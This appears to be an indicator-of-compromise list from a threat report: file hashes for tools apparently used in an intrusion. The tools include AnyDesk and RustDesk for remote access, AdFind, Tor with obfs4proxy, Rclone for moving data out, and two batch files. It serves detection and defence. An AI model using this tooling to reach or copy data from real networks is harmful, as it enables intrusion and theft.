SHA1    1b4ed1e4e6d3f8effb0f119056d5b06342d80524                          ssh.exe
SHA1    1c15c368e8ba7e6145a9d058517f2f0bc32e3336                          rustdesk-1.2.3-2-x86_64.exe
SHA256  1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499  Anydesk.exe
SHA256  2b2d977e61113bbd9c160911fa62953316cc49d6a6ad95559be76ba33076e03c  WizTree64.exe
SHA256  2c8d7ee893c1b9d4a480321e03311282817ca52dbf74f9605219365767e61a23  Tor.exe
SHA256  419fc0cfc48f8558a16204ec3ec196e245aacddb00e963da29252e455bf0cb88  1.bat
SHA256  45126297c07c6ef56b51440cd0dc30acf7b3b938e2e9e656334886fe2f81f220  AnyDesk.exe
SHA256  4b8be22b23cd9098218a6f744baeb45c51b6fad6a559b01fe92dbb53c6e2c128  AdFind.exe
SHA256  55e4ce3fe726043070ecd7de5a74b2459ea8bed19ef2a36ce7884b2ab0863047  AnyDesk.exe
SHA1    60805858896010db0cf531135e68fbb38e50fd62                          SSH.exe
SHA256  6ae696aa26388f437e877abb4560205120c8a96da3efc6e95c8a224c7ee4dae8  obfs4proxy.exe
SHA1    6d417e0a2ed3088786656205e105b146ddf79cf6                          wdfuai.bat
SHA256  76652508b09bae5ef7b6fcd049006d0285be99caa2008dd746a4bcd66f90aa1e  AnyDesk.exe
SHA256  85ad9bfcd17883d99508c56e91702259c0a0cca810b0e4c6018aae6d2dffccd2  Veeam installer (181e3c70.msi)
SHA256  89a41aee09b97bd7a965f8dd254b88fa31b0398a8d7d50415f10b2bf0aa43944  WizTree.exe
SHA256  8a878d4c2dff7ae0ec4f20c9ddbbe40b1d6c801d07b9db04597e46b852ea2dc5  Rclone.exe
SHA1    a0d1a4f068ed3ed585e5cec6c787521b1c0d2d64                          ssh.exe
SHA256  adf30c7f5d800abedeae4507f090dc699e9cb80464e514bd11e3d466c4c32318  AnyDesk.exe
SHA256  b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682  AdFind.exe
SHA256  c77496e2dbd3eeb440ff001ffc535a5ac9982dcadab0fa1cbbc1ec0a9c9b7dc9  AnyDesk.exe
SHA256  d034d92ecdfc79741edccb803113dd7af23f5cde96b165d7449d8f7c02b7d6cb  rclone-v1.64.2-windows-amd64.zip
SHA1    da099662090f6b6155fbc44da1b1349c8ff69f1d                          ssh.exe
SHA256  e41c537036e06a8fe49b1151b7c1684706c70b394bae99ca4d073e9e415d2918  AnyDesk.exe
SHA256  e8111555dd2fc28660af89199f308a6533a642aef605ecebf7a6c49c0ac7d1a9  Tor.exe
SHA1    ef57fc8f05b47f5173bdd8c12d5a3a407d74c431                          obfs4proxy.exe
SHA256  fb8fb89b5f56ce2acd9668021a470a18b7898808750800861151e908d5b1a20e  AnyDesk.exe
SHA256  fc19f3275d02764cf249dc6fe8962e06b83a4f5769cc369bc4f77b90c567df18  AnyDesk.exe